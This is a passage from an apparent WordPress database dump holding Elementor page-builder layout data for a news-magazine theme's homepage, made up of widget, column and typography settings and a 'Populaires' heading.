"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1369,479,'_elementor_version','0.4'),(1370,479,'_elementor_css','a:3:{s:4:\"time\";i:1508914169;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1372,480,'_elementor_edit_mode','builder'),(1373,480,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list1_mar